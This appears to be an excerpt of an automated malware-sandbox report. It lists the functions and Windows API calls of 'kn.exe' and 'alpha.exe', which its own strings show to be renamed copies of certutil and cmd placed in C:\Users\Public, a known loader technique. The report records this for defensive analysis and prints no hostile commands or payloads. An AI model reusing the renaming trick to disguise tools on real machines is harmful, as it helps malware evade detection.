Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AEE94 CryptSignMessage,SetLastError,7_2_00007FF6AA2AEE94
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA220E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,7_2_00007FF6AA220E94
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA252E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF6AA252E7C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF6AA280EF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E0ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,7_2_00007FF6AA2E0ED0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6F2C NCryptExportKey,#360,7_2_00007FF6AA2B6F2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA218F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,7_2_00007FF6AA218F1C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA276374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,7_2_00007FF6AA276374
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA272358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,7_2_00007FF6AA272358
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20E3B0 #357,#357,CryptDecodeObject,LocalFree,7_2_00007FF6AA20E3B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2223E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,7_2_00007FF6AA2223E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B8404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF6AA2B8404
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA204410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA204410
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,7_2_00007FF6AA25A450
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,7_2_00007FF6AA25C450
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA278488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA278488
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F44E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA1F44E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA27F2F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2592D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,7_2_00007FF6AA2592D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2632D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF6AA2632D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2492C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,7_2_00007FF6AA2492C4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,7_2_00007FF6AA21B324
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,7_2_00007FF6AA26D30C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA21D304
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA285768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA285768
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,7_2_00007FF6AA24F774
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AD750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,7_2_00007FF6AA2AD750
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2837A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA2837A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA29B794 CryptExportPublicKeyInfoEx,SetLastError,7_2_00007FF6AA29B794
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,7_2_00007FF6AA21D790
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25577C #360,#358,CryptDecodeObject,GetLastError,#357,7_2_00007FF6AA25577C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1FB788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,7_2_00007FF6AA1FB788
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2997E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,7_2_00007FF6AA2997E4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2217D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,7_2_00007FF6AA2217D4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,7_2_00007FF6AA26B808
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF6AA21F810
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AF7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,7_2_00007FF6AA2AF7FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA283860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA283860
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF6AA27184C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,7_2_00007FF6AA26D850
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6AA2B98B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA259878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,7_2_00007FF6AA259878
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA217884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,7_2_00007FF6AA217884
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2518DC CertFindExtension,CryptDecodeObject,GetLastError,#357,7_2_00007FF6AA2518DC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26B8D0 I_CryptGetLruEntryData,#357,7_2_00007FF6AA26B8D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA203918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA203918
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,7_2_00007FF6AA28391C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AF918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,7_2_00007FF6AA2AF918
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F38FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF6AA1F38FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AF570 CryptHashCertificate,SetLastError,7_2_00007FF6AA2AF570
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,7_2_00007FF6AA24B55C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA283590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA283590
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B9580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,7_2_00007FF6AA2B9580
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2455F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,7_2_00007FF6AA2455F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA20D5C2
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20F630 CryptAcquireContextW,GetLastError,#357,SetLastError,7_2_00007FF6AA20F630
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2695FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,7_2_00007FF6AA2695FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F5664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,7_2_00007FF6AA1F5664
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,7_2_00007FF6AA25366C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,7_2_00007FF6AA26B664
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF6AA20D660
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AF650 CryptHashCertificate2,SetLastError,7_2_00007FF6AA2AF650
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA283654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF6AA283654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA27F644
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2376B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6AA2376B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA29D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,7_2_00007FF6AA29D6A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A9688 CryptFindOIDInfo,#357,#360,#360,#360,7_2_00007FF6AA2A9688
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2836E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA2836E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,7_2_00007FF6AA26F6D8
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1231464310.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1235221791.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1244206775.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1241022537.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1248509185.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1246282305.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1249800313.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1248949309.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1231464310.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1235221791.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1244206775.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1241022537.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1248509185.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1246282305.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1249800313.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1248949309.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF7CD481560
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF7CD4A7B4C
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF7CD481560
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF7CD4A7B4C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF6AA2C6F80
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6AA2C10C4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6AA2C3100
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF6AA2C234C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA25C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF6AA25C6F8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA26DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF6AA26DBC0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF6AA2C19F8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF6AA2C1B04
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA265E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF6AA265E58
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA26B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF6AA26B3D8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA22D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA22D440
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA26D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF6AA26D4A4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2A3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF6AA2A3674
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF7CD481560
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF7CD4A7B4C
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF7CD481560
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7CD4A7B4C
Source: kn.exe | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
